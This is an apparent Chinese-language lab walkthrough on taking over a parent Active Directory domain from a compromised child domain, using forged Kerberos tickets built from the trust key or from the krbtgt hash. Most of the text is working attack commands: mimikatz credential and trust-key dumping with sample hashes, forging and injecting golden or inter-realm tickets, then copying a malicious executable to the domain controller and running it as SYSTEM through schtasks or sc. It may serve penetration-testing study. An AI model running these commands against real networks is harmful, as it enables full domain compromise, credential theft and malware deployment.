利用域信任密钥获取目标域
实验环境
IP地址 | 所属域 | 域中地位 | 机器名 | 当前登录用户 |
192.168.113.152 | test.com | 根域的域控 | DC | hack\administrator |
192.168.113.153 | abc.test.com | 子域的域控 | DC2 | abc\administrator |
192.168.113.156 | abc.test.com | 子域中的机器 | Abc-losy | abc\losy |
当前已经控制abc.hack.com域,其中包括 DC2机器和ABC-LOSY机器
实验步骤
当前losy用户无法访问DC.test.COM
shell dir \\dc.test.com\c$
在控制的dc2下面使用mimikatz获取 当前域的 SID 父域的 SID 子域域管的NTLM 信任密钥
mimikatz.exe "privilege::debug" "lsadump::lsa /patch /user:TEST$" "lsadump::trust /patch" exit
mimikatz privilege::debug
mimikatz lsadump::lsa /patch /user:TEST$
mimikatz lsadump::trust /patch
Current domain: ABC.TEST.COM (ABC / S-1-5-21-138967882-756984254-3016740272)
Domain: TEST.COM (TEST / S-1-5-21-2071415428-1615975719-3128489008)
rc4_hmac_nt:277a4340abf41c1a580dc99c730f20d8
在普通的域内用户(losy)中创建创建高权限票据
mimikatz.exe "kerberos::golden /domain:子域 /sid:子域SID /sids:父域-519 /rc4:信任密钥 /user:任意用户 /service:krbtgt /target:父域 /ticket:subdc_administrator.kirbi" exit
à
mimikatz kerberos::golden /domain:abc.test.com/sid:S-1-5-21-138967882-756984254-3016740272/sids:S-1-5-21-2071415428-1615975719-3128489008-519 /rc4:277a4340abf41c1a580dc99c730f20d8/user:administrator/service:krbtgt /target:test.com /ticket:administrator.kirbi
上传asktgs.exe和kirbikator.exe工具
asktgs.exe伪造票据,kirbikator.exe注入票据
创建CIFS服务的票据进行复制文件的操作
shell asktgs.exe administrator.kirbi CIFS/DC.test.com
将票据注入内存
shell kirbikator.exe lsa CIFS.DC.test.com.kirbi
访问域控
shell dir \\dc.test.com\c$
服务恶意文件,如果复制失败,请注入host服务票据。
shell copy 123.exe \\dc.test.com\c$
伪造host服务,进行创建计划任务
shell asktgs.exe administrator.kirbi host/DC.test.com
将票据注入内存
shell kirbikator.exe lsa host.DC.test.com.kirbi
上传恶意文件并创建计划任务
shell copy 123.exe \\dc.test.com\C$\
shell schtasks /create /s dc.test.com /tn test123 /sc onstart /tr c:\123.exe /ru system /f
执行计划任务
shell schtasks /run /s dc.test.com /i /tn "test123"
用sc也可以:
shell copy 123.exe \\dc.test.com\C$\
shell sc \\dc.test.com create test binpath= "cmd.exe /c c:\123.exe"
shell sc \\dc.test.com start test
shell sc \\dc.test.com delete test
提示
如果做着做着,就遇到拒绝访问的情况
说明票据的时间戳失效了,要shell klist purge后重新做
利用krbtgt哈希值获取目标域
实验环境
IP地址 | 所属域 | 域中地位 | 机器名 | 当前登录用户 |
192.168.113.152 | test.com | 根域的域控 | DC | hack\administrator |
192.168.113.153 | abc.test.com | 子域的域控 | DC2 | abc\administrator |
192.168.113.156 | abc.test.com | 子域中的机器 | Abc-losy | abc\losy |
当前已经控制abc.hack.com域,其中包括 DC2机器和ABC-LOSY机器
实验步骤
在dc2里面获取Krbtgt散列
mimikatz lsadump::lsa /patch /user:krbtgt
NTLM : f778d436c7b4ccecb735d596638c547a
在dc2里面获取关键信息
mimikatz lsadump::trust /patch
Current domain: ABC.TEST.COM (ABC / S-1-5-21-138967882-756984254-3016740272)
Domain: TEST.COM (TEST / S-1-5-21-2071415428-1615975719-3128489008)
在losy用户下构造并注入黄金票据
mimikatz Kerberos::golden /user:administrator /domain:当前域名/sid:当前SID /sids:目标域SID-519 /krbtgt:krbtgt散列/ptt
à
mimikatz Kerberos::golden /user:administrator /domain:abc.test.com/sid:S-1-5-21-138967882-756984254-3016740272/sids:S-1-5-21-2071415428-1615975719-3128489008-519 /krbtgt:f778d436c7b4ccecb735d596638c547a/ptt
访问目标域
shell dir \\dc.test.com\c$
上传恶意文件并创建计划任务
shell copy 123.exe \\dc.test.com\C$\
shell schtasks /create /s dc.test.com /tn test123 /sc onstart /tr c:\123.exe /ru system /f
执行计划任务
shell schtasks /run /s dc.test.com /i /tn "test123"